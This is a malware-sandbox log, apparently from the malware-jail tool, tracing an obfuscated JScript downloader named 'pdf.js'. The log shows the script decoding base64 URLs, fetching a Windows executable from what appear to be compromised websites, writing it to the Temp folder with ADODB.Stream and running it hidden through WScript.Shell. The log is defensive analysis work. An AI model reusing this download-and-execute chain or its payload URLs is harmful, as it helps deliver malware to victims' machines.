-
Notifications
You must be signed in to change notification settings - Fork 100
/
pdf.js.out
105 lines (105 loc) · 9.04 KB
/
pdf.js.out
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
4 Oct 14:04:05 - mailware-jail, a malware sandbox ver. 0.15
4 Oct 14:04:05 - ------------------------
4 Oct 14:04:05 - Arguments: --down malware/20171004/pdf.js -s malware/20171004/
4 Oct 14:04:05 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js
4 Oct 14:04:05 - Malware files: malware/20171004/pdf.js
4 Oct 14:04:05 - Execution timeout set to: 60 seconds
4 Oct 14:04:05 - Output file for sandbox dump: sandbox_dump_after.json
4 Oct 14:04:05 - Output directory for generated files: malware/20171004/
4 Oct 14:04:05 - Download from remote server: Yes
4 Oct 14:04:05 - ==> Preparing Sandbox environment.
4 Oct 14:04:05 - => Executing: env/utils.js quitely
4 Oct 14:04:05 - => Executing: env/eval.js quitely
4 Oct 14:04:05 - => Executing: env/function.js quitely
4 Oct 14:04:05 - => Executing: env/wscript.js quitely
4 Oct 14:04:05 - => Executing: env/browser.js quitely
4 Oct 14:04:05 - => Executing: env/agents.js quitely
4 Oct 14:04:05 - => Executing: env/other.js quitely
4 Oct 14:04:05 - => Executing: env/console.js quitely
4 Oct 14:04:05 - ==> Executing malware file(s). =========================================
4 Oct 14:04:05 - => Executing: malware/20171004/pdf.js verbosely, reporting silent catches
4 Oct 14:04:05 - Saving: malware/20171004/malware_20171004_pdf.js
4 Oct 14:04:05 - Saving: malware/20171004/tr_malware_20171004_pdf.js
4 Oct 14:04:05 - WScript.scriptfullname = (string) 'malware/20171004/pdf.js'
4 Oct 14:04:05 - WScript.arguments = (object) 'malware/20171004/pdf.js,xyz'
4 Oct 14:04:05 - new Function(CEMENT,CEMENT2, CEMENT[CEMENT2]();) => Function[14]
4 Oct 14:04:05 - new Function(CEMENT,CEMENT, trigDA = new Function('vVREBFF3','return \"TVM=\".acetilenButan();');) => Function[15]
4 Oct 14:04:05 - Calling Function[15]() on sandbox
4 Oct 14:04:05 - new Function(vVREBFF3, return "TVM=".acetilenButan();) => Function[16]
4 Oct 14:04:05 - Returning: 'undefined'
4 Oct 14:04:05 - Calling Function[16]() on sandbox
4 Oct 14:04:05 - Returning: 'MS'
4 Oct 14:04:05 - new Function(HORN, var GALAXY = "chastity necessarily()";var kelso = "ADODB.Str32"; return kelso.replace("DILBO", "D").replace("32", "eam");) => Function[17]
4 Oct 14:04:05 - ActiveXObject(WScript.Shell)
4 Oct 14:04:05 - new WScript.Shell[18]
4 Oct 14:04:05 - >>> Silencing catch ReferenceError: ori_sel is not defined
at mimimix2 (malware/20171004/pdf.js:238:10)
at malware/20171004/pdf.js:250:1
at ContextifyScript.Script.runInContext (vm.js:32:29)
at Object.runInContext (vm.js:87:6)
at run_in_ctx (/home2/hynek/malware-jail/jailme.js:322:16)
at Object.<anonymous> (/home2/hynek/malware-jail/jailme.js:357:20)
at Module._compile (module.js:571:32)
at Object.Module._extensions..js (module.js:580:10)
at Module.load (module.js:488:32)
at tryModuleLoad (module.js:447:12)
4 Oct 14:04:05 - ActiveXObject(MSXML2.XMLHTTP)
4 Oct 14:04:05 - new MSXML2.XMLHTTP[19]
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].onreadystatechange = (undefined) 'undefined'
4 Oct 14:04:05 - Calling eval[1]('')
4 Oct 14:04:05 - WScript.Shell[18].ExpandEnvironmentStrings(%TEMP%) => C:\Users\User\AppData\Local\Temp
4 Oct 14:04:05 - Calling eval[2]('')
4 Oct 14:04:05 - new Function(Desdimonproducer_FROG2_a5,Desdimonproducer_FROG2HORDA5, return Desdimonproducer_FROG2_bChosteck.acetilenButan() + Desdimonproducer_FROG2_a5[Desdimonproducer_FROG2HORDA5].acetilenButan();) => Function[20]
4 Oct 14:04:05 - Calling Function[20](CEMENTbXlzCEMENTdXNoaS5pdC91eWl0ZnU2NXV5Pw==,CEMENTeW9tYTg4OC5jb20vdCEMENTXlpdGZ1NjV1eT8=,YWltb25pbm8uaW5mby9wNjYvdXlpdGZ1NjV1eQ==CEMENTcmVzdGF1cmFudGVsYnVybGFkZXJvLmNvbS91eWCEMENTl0ZnU2NXV5Pw==,,CEMENT, 0) on sandbox
4 Oct 14:04:05 - Returning: 'http://mysushi.it/uyitfu65uy?'
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].open(GET,http://mysushi.it/uyitfu65uy??UDqQmLVi=UDqQmLVi,false)
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].method = (string) 'GET'
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].url = (string) 'http://mysushi.it/uyitfu65uy??UDqQmLVi=UDqQmLVi'
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].async = (boolean) 'false'
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].setRequestHeader(User-Agent, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0))
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].send(undefined)
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].method.get() => (string) 'GET'
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].url.get() => (string) 'http://mysushi.it/uyitfu65uy??UDqQmLVi=UDqQmLVi'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].status = (number) '200'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].readystate = (number) '4'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].statustext = (string) 'OK'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].responsebody = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"????????????????????????????????? ... (truncated)'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].allresponseheaders = (string) '{"server":"nginx","date":"Wed, 04 Oct 2017 12:04:05 GMT","content-type":"text/plain","content-length":"588800","last-modified":"Tue, 03 Oct 2017 15:45:19 GMT","connection":"close","etag":"\"59d3b08f-8fc00\"","x-powered-by":"PleskLin","accept-ranges": ... (truncated)'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].status.get() => (number) '200'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].allresponseheaders.get() => (string) '{"server":"nginx","date":"Wed, 04 Oct 2017 12:04:05 GMT","content-type":"text/plain","content-length":"588800","last-modified":"Tue, 03 Oct 2017 15:45:19 GMT","connection":"close","etag":"\"59d3b08f-8fc00\"","x-powered-by":"PleskLin","accept-ranges": ... (truncated)'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"????????????????????????????????? ... (truncated)'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].statustext.get() => (string) 'OK'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].onreadystatechange.get() => (undefined) 'undefined'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"????????????????????????????????? ... (truncated)'
4 Oct 14:04:06 - Calling Function[17]() on sandbox
4 Oct 14:04:06 - Returning: 'ADODB.Stream'
4 Oct 14:04:06 - ActiveXObject(ADODB.Stream)
4 Oct 14:04:06 - new ADODB_Stream[21]
4 Oct 14:04:06 - new Function(CEMENT,CEMENT2, CEMENT['write'](CEMENT2);) => Function[22]
4 Oct 14:04:06 - Calling Function[14](ADODB_Stream[21], open) on sandbox
4 Oct 14:04:06 - ADODB_Stream[21].Open()
4 Oct 14:04:06 - Returning: 'undefined'
4 Oct 14:04:06 - ADODB_Stream[21].type = (number) '1'
4 Oct 14:04:06 - Calling Function[22](ADODB_Stream[21], MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"??????????????? ... (truncated)) on sandbox
4 Oct 14:04:06 - ADODB_Stream[21].content = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"????????????????????????????????? ... (truncated)'
4 Oct 14:04:06 - ADODB_Stream[21].Write(str) - 588800 bytes
4 Oct 14:04:06 - ADODB_Stream[21].size = (number) '588800'
4 Oct 14:04:06 - Returning: 'undefined'
4 Oct 14:04:06 - ADODB_Stream[21].position = (number) '0'
4 Oct 14:04:06 - ADODB_Stream[21].SaveToFile(C:\Users\User\AppData\Local\Temp/UDqQmLVi2.exe, 2)
4 Oct 14:04:06 - ADODB_Stream[21].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"????????????????????????????????? ... (truncated)'
4 Oct 14:04:06 - ADODB_Stream[21].Close()
4 Oct 14:04:06 - WScript.Shell[18].Run(C:\Users\User\AppData\Local\Temp/UDqQmLVi2.exe, 0, false)
4 Oct 14:04:06 - ==> Cleaning up sandbox.
4 Oct 14:04:06 - ==> Script execution finished, dumping sandbox environment to a file.
4 Oct 14:04:06 - The sandbox context has been saved to: sandbox_dump_after.json
4 Oct 14:04:06 - Saving: malware/20171004/eval1.js
4 Oct 14:04:06 - Saving: malware/20171004/eval2.js
4 Oct 14:04:06 - Saving: malware/20171004/Function[14].js
4 Oct 14:04:06 - Saving: malware/20171004/Function[15].js
4 Oct 14:04:06 - Saving: malware/20171004/Function[16].js
4 Oct 14:04:06 - Saving: malware/20171004/Function[17].js
4 Oct 14:04:06 - Saving: malware/20171004/Function[20].js
4 Oct 14:04:06 - Saving: malware/20171004/Function[22].js
4 Oct 14:04:06 - Saving: malware/20171004/C__Users_User_AppData_Local_Temp_UDqQmLVi2.exe
4 Oct 14:04:06 - Saving: malware/20171004/urls.json